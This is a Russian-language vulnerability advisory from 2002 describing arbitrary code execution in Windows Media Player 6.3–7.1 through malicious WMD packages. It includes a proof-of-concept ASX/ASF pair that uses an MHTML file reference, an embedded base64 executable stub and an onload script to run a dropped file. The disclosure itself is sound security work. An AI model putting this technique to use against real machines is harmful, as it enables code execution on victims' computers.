Выполнение произвольного кода в Microsoft Windows Media Player

Дата публикации:
28.08.2002
Всего просмотров:
1598
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Microsoft Windows Media Player позволяет злонамеренному вложению выполнять произвольный код с системными привилегиями. Уязвимость связанна с неправильной проверкой правильности WMD (*.wmd) файлов. WMD (Windows Media Download) пакеты используются Media Player, чтобы хранить файлы в известном для пользователя каталоге. Нападающий можест составить злонамеренный WMD файл. Состоящий из злонамеренных .ASX и .ASF файлов, которые Media Player извлечет в известное местоположение и затем выполнит злонамеренный код. Пример комбинированных .ASX и .ASF файлов: 1. *.asx файл:
<ASX version="3">
<Entry>
<ref HREF="cluster.asf"/>
</Entry></ASX>
MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA
<applet CLASSID="CLSID:55555555-5555" 
codebase="mhtml:file:///C:\My Documents\My Music\Virtual 
Albums\malware\f ck.asx!file:///malware.exe">
2. *.asf файл:
url: cluster.html

<body onload=malware()>
 <script>
function malware(){
alert("malware");location=("file://C%3A%5CMy%20Documents%5CMy%20Music%
5CVirtual%20Albums%5Cmalware%5Cf ck.asx%20.")
 }
  </script>
уязвимость обнаружена в Microsoft Windows Media Player 6.3-7.1

Ссылки: Terrible: Windows Media Player
или введите имя

CAPTCHA